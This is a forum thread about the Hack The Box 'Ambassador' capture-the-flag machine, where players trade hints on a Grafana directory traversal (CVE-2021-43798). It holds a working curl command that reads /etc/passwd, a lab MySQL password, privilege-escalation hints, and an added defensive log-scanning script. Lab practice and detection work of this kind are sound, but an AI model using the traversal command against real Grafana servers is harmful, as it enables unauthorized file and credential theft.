Ambassador - HTB [Discussion]
I'm in dashboard rn. What do I do now?
Reply
(October 1, 2022, 08:10 PM)snowmanballs Wrote:
(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?


Just look at the code and manually craft the URL. It's pretty simple.

How did you elaborate the url?
Reply
(October 1, 2022, 08:48 PM)coder1777 Wrote:
(October 1, 2022, 08:10 PM)snowmanballs Wrote:
(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?


Just look at the code and manually craft the URL. It's pretty simple.

How did you elaborate the url?

It's literally in the code..
Reply
(October 1, 2022, 08:48 PM)coder1777 Wrote:
(October 1, 2022, 08:10 PM)snowmanballs Wrote:
(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?


Just look at the code and manually craft the URL. It's pretty simple.

How did you elaborate the url?


You do this:
```
curl --path-as-is http://<machine-ip>:3000/public/plugins/alertlist/../../../../etc/passwd
```
Reply
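Editor's added example, not part of any post in this thread: a defender-side check that flags the request shape shown in the post above (a `/public/plugins/<id>/` URL that resolves outside the plugin directory, as in CVE-2021-43798) in web access logs. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"
# Assumption: access log in common log format that records the raw request line.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not taken from the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2022:20:48:11 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1983',
    '203.0.113.7 - - [01/Oct/2022:20:48:15 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1983',
    '192.0.2.10 - - [01/Oct/2022:20:49:02 +0000] "GET /public/plugins/alertlist/img/../module.js HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Oct/2022:20:49:03 +0000] "GET /api/health HTTP/1.1" 200 70',
]


def escapes_plugin_dir(raw_target):
    """True if a /public/plugins/<id>/... target resolves outside <id>/."""
    path = raw_target.split("?", 1)[0]
    for _ in range(2):  # decode twice: catches %2e%2e and %252e%252e
        path = unquote(path)
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, _, sub = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id:
        return False
    base = PLUGIN_PREFIX + plugin_id
    # Resolve ".." segments the way a filesystem join would, then compare.
    resolved = posixpath.normpath(base + "/" + sub)
    return not (resolved == base or resolved.startswith(base + "/"))


def scan(lines):
    """Return (client, raw_target) for every request that leaves its plugin dir."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and escapes_plugin_dir(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {target}")
```

A `..` segment that stays inside the plugin directory (third sample line) is not flagged, which keeps the rule quiet on legitimate asset requests.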
https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

mysql password: dontStandSoCloseToMe63221!
Reply
(October 1, 2022, 09:23 PM)Truss46 Wrote: https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

mysql password: dontStandSoCloseToMe63221!


need help with root
Reply
Does anyone have anything new?
Get no further.
Reply
Were you able to access the database with the credentials?
Reply
(October 1, 2022, 10:51 PM)yumi Wrote: Were you able to access the database with the credentials?


Yes, but I can't get any further.
Reply
I think it has to do with the Python app in /opt/my-app
and with that venv,
but I'm not sure how to exploit it so far.
There is also a second database running on 127.0.0.1:33060.
Reply